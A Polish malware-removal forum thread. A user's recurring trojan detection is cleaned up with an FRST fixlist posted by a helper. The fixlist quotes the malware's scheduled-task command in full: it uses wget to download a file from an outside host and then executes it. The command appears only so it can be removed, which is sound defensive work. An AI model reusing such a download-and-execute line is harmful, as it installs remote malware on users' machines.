Prośba o wykrycie wirusa


(Lkvfnovbniosn) #1

Od jakiegoś czasu mój laptop czasami się zawiesza na kilka sekund oraz zdarza się mu "myśleć" bez podstawy. Po przeskanowaniu eset nic nie wykrywa a emergency kit wykrył: C:\ProgramData\dat.bmp     Wykryto: Trojan.GenericKD.2115200 (B)

Po usunięciu plik dat.bmp powraca.

 

 

http://www.wklej.org/id/1723300/

http://www.wklej.org/id/1723298/


(Acorus) #2

Otwórz notatnik systemowy i wklej:

Task: {4FA7A903-703A-4763-8353-B3CCE6BB706C} - System32\Tasks\SYSTEM = cmd.exe /R cd "C:
\ProgramData" amp; ping 1.1.1.1 -n 300 -w 1000 amp; wget -t 0 --retry-connrefused -O
dat.bmp http://grogle.in/dat.bmp?data=vhGlVIjxXN;AcrobatPro_11_Web_WWMUI.exe;1424289424
amp; start cmd /R dat.bmp ==== ATTENTION
HKU\S-1-5-21-2104228876-2350865772-4012445646-1000\...\Run: [] = [X]
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - DefaultScope {71969352-5273-4E30-B18B-CCD07FEFBB18} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {30C2C443-1959-4395-84AE-59B78A25EA85} URL = http://rover.ebay.com/rover/1/4908-44618-9400-8/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {3EF164B4-6896-48F3-B0F4-860ECCFA1660} URL = http://rover.ebay.com/rover/1/4908-44618-9400-8/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {45D7246C-7BEF-43CC-ABA4-5C09C802E3ED} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {71969352-5273-4E30-B18B-CCD07FEFBB18} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {AD76EB3A-BF21-4983-BEEF-A672A06F709F} URL = http://www.amazon.co.uk/gp/search?ie=UTF8keywords={searchTerms}tag=tochibauk-win7-ie-search-21index=blendedlinkCode=ur2
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1000 - {CE95908F-8160-4595-B6F6-1DA44EC7B955} URL = http://www.amazon.co.uk/gp/search?ie=UTF8keywords={searchTerms}tag=tochibauk-win7-ie-search-21index=blendedlinkCode=ur2
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - DefaultScope {71969352-5273-4E30-B18B-CCD07FEFBB18} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - {30C2C443-1959-4395-84AE-59B78A25EA85} URL = http://rover.ebay.com/rover/1/4908-44618-9400-8/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - {45D7246C-7BEF-43CC-ABA4-5C09C802E3ED} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - {71969352-5273-4E30-B18B-CCD07FEFBB18} URL =
SearchScopes: HKU\S-1-5-21-2104228876-2350865772-4012445646-1002 - {AD76EB3A-BF21-4983-BEEF-A672A06F709F} URL = http://www.amazon.co.uk/gp/search?ie=UTF8keywords={searchTerms}tag=tochibauk-win7-ie-search-21index=blendedlinkCode=ur2
CHR Extension: (Bookmark Manager) - C:\Users\AP\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-04-15]
S3 Tosrfcom; No ImagePath
S3 andnetadb; System32\Drivers\lgandnetadb.sys [X]
S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X]
C:\ProgramData\wget.exe
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.

Przeskanuj programem Malwarebytes Anti-Malware http://www.malwarebytes.org/8/


(Lkvfnovbniosn) #3

Fix zrbiony. Po przeskanowaniu wykryło dwa wirusy, które usunąłem.


(Acorus) #4

Skasuj folder C:\FRST.